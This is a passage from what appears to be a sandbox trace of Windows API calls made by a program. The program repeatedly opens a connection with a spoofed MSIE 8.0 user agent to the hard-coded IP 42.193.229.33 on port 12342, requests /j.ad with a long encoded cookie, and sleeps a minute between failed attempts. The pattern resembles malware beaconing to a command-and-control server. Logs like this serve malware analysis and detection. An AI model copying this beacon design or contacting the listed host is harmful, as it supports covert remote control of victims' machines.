lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0172.941] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0172.941] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0172.941] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0172.941] Sleep (dwMilliseconds=0xea60) [0172.948] GetLastError () returned 0x2efd [0172.948] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0172.948] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0172.949] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0172.949] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0172.949] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0172.949] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0172.949] GetLastError () returned 0x0 [0172.950] htonl (hostlong=0x7000000) returned 0x7 [0172.950] htonl (hostlong=0x0) returned 0x0 [0172.950] htonl (hostlong=0x3000000) returned 0x3 [0172.950] htonl (hostlong=0x6000000) returned 0x6 [0172.950] htonl (hostlong=0x6000000) returned 0x6 [0172.951] GetLastError () returned 0x0 [0172.951] htonl (hostlong=0x0) returned 0x0 [0172.951] GetLastError () returned 0x0 [0172.951] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0172.951] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0174.968] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0174.968] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0174.968] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0174.968] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0174.968] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0174.968] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0174.968] Sleep (dwMilliseconds=0xea60) [0174.976] GetLastError () returned 0x2efd [0174.981] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0174.981] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0174.981] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0174.981] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0174.982] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0174.982] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0174.982] GetLastError () returned 0x0 [0174.982] htonl (hostlong=0x7000000) returned 0x7 [0174.982] htonl (hostlong=0x0) returned 0x0 [0174.982] htonl (hostlong=0x3000000) returned 0x3 [0174.982] htonl (hostlong=0x6000000) returned 0x6 [0174.982] htonl (hostlong=0x6000000) returned 0x6 [0174.982] GetLastError () returned 0x0 [0174.982] htonl (hostlong=0x0) returned 0x0 [0174.982] GetLastError () returned 0x0 [0174.982] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0174.983] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0176.971] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0176.971] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0176.971] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0176.971] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0176.971] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0176.971] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0176.971] Sleep (dwMilliseconds=0xea60) [0176.973] GetLastError () returned 0x2efd [0176.973] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0176.973] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0176.973] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0176.973] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0176.973] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0176.973] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0176.974] GetLastError () returned 0x0 [0176.974] htonl (hostlong=0x7000000) returned 0x7 [0176.974] htonl (hostlong=0x0) returned 0x0 [0176.974] htonl (hostlong=0x3000000) returned 0x3 [0176.974] htonl (hostlong=0x6000000) returned 0x6 [0176.974] htonl (hostlong=0x6000000) returned 0x6 [0176.974] GetLastError () returned 0x0 [0176.974] htonl (hostlong=0x0) returned 0x0 [0176.974] GetLastError () returned 0x0 [0176.974] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0176.974] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0178.937] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0178.937] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0178.937] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0178.937] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0178.938] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0178.938] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0178.938] Sleep (dwMilliseconds=0xea60) [0178.938] GetLastError () returned 0x2efd [0178.939] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0178.939] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0178.939] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0178.939] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0178.939] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0178.939] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0178.939] GetLastError () returned 0x0 [0178.939] htonl (hostlong=0x7000000) returned 0x7 [0178.939] htonl (hostlong=0x0) returned 0x0 [0178.939] htonl (hostlong=0x3000000) returned 0x3 [0178.939] htonl (hostlong=0x6000000) returned 0x6 [0178.940] htonl (hostlong=0x6000000) returned 0x6 [0178.940] GetLastError () returned 0x0 [0178.940] htonl (hostlong=0x0) returned 0x0 [0178.940] GetLastError () returned 0x0 [0178.940] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0178.940] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0180.954] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0180.954] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0180.954] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0180.954] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0180.954] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0180.954] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0180.954] Sleep (dwMilliseconds=0xea60) [0180.966] GetLastError () returned 0x2efd [0180.967] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0180.967] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0180.967] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0180.967] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0180.967] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0180.967] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0180.967] GetLastError () returned 0x0 [0180.967] htonl (hostlong=0x7000000) returned 0x7 [0180.967] htonl (hostlong=0x0) returned 0x0 [0180.967] htonl (hostlong=0x3000000) returned 0x3 [0180.967] htonl (hostlong=0x6000000) returned 0x6 [0180.967] htonl (hostlong=0x6000000) returned 0x6 [0180.967] GetLastError () returned 0x0 [0180.968] htonl (hostlong=0x0) returned 0x0 [0180.968] GetLastError () returned 0x0 [0180.968] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0180.968] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0182.937] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0182.937] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0182.937] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0182.937] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0182.937] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0182.937] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0182.937] Sleep (dwMilliseconds=0xea60) [0182.948] GetLastError () returned 0x2efd [0182.948] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0182.949] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0182.949] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0182.949] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0182.949] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0182.949] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0182.949] GetLastError () returned 0x0 [0182.949] htonl (hostlong=0x7000000) returned 0x7 [0182.949] htonl (hostlong=0x0) returned 0x0 [0182.949] htonl (hostlong=0x3000000) returned 0x3 [0182.949] htonl (hostlong=0x6000000) returned 0x6 [0182.949] htonl (hostlong=0x6000000) returned 0x6 [0182.949] GetLastError () returned 0x0 [0182.949] htonl (hostlong=0x0) returned 0x0 [0182.949] GetLastError () returned 0x0 [0182.949] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0182.949] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0184.936] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0184.936] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0184.936] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0184.936] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0184.936] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0184.936] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0184.936] Sleep (dwMilliseconds=0xea60) [0184.945] GetLastError () returned 0x2efd [0184.958] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0184.958] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0184.958] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0184.958] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0184.958] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0184.958] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0184.958] GetLastError () returned 0x0 [0184.958] htonl (hostlong=0x7000000) returned 0x7 [0184.958] htonl (hostlong=0x0) returned 0x0 [0184.958] htonl (hostlong=0x3000000) returned 0x3 [0184.958] htonl (hostlong=0x6000000) returned 0x6 [0184.958] htonl (hostlong=0x6000000) returned 0x6 [0184.958] GetLastError () returned 0x0 [0184.958] htonl (hostlong=0x0) returned 0x0 [0184.958] GetLastError () returned 0x0 [0184.958] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0184.958] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0186.936] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0186.936] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0186.936] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0186.937] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0186.937] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0186.937] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0186.937] Sleep (dwMilliseconds=0xea60) [0186.942] GetLastError () returned 0x2efd [0186.942] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0186.942] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0186.942] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0186.942] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0186.942] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0186.942] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0186.943] GetLastError () returned 0x0 [0186.943] htonl (hostlong=0x7000000) returned 0x7 [0186.943] htonl (hostlong=0x0) returned 0x0 [0186.943] htonl (hostlong=0x3000000) returned 0x3 [0186.943] htonl (hostlong=0x6000000) returned 0x6 [0186.943] htonl (hostlong=0x6000000) returned 0x6 [0186.943] GetLastError () returned 0x0 [0186.943] htonl (hostlong=0x0) returned 0x0 [0186.943] GetLastError () returned 0x0 [0186.943] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0186.943] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0188.995] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0188.995] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0188.995] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0188.995] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0188.995] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0188.995] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0188.995] Sleep (dwMilliseconds=0xea60) [0189.001] GetLastError () returned 0x2efd [0189.001] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0189.007] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0189.007] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0189.007] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0189.007] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0189.007] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0189.007] GetLastError () returned 0x0 [0189.007] htonl (hostlong=0x7000000) returned 0x7 [0189.007] htonl (hostlong=0x0) returned 0x0 [0189.007] htonl (hostlong=0x3000000) returned 0x3 [0189.007] htonl (hostlong=0x6000000) returned 0x6 [0189.007] htonl (hostlong=0x6000000) returned 0x6 [0189.007] GetLastError () returned 0x0 [0189.007] htonl (hostlong=0x0) returned 0x0 [0189.007] GetLastError () returned 0x0 [0189.007] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0189.007] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0191.005] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0191.005] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0191.005] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0191.006] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0191.006] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0191.006] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0191.006] Sleep (dwMilliseconds=0xea60) [0191.013] GetLastError () returned 0x2efd [0191.013] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0191.013] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0191.013] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0191.013] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0191.013] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0191.013] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0191.013] GetLastError () returned 0x0 [0191.014] htonl (hostlong=0x7000000) returned 0x7 [0191.014] htonl (hostlong=0x0) returned 0x0 [0191.014] htonl (hostlong=0x3000000) returned 0x3 [0191.014] htonl (hostlong=0x6000000) returned 0x6 [0191.014] htonl (hostlong=0x6000000) returned 0x6 [0191.014] GetLastError () returned 0x0 [0191.014] htonl (hostlong=0x0) returned 0x0 [0191.014] GetLastError () returned 0x0 [0191.014] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0191.014] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0192.990] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 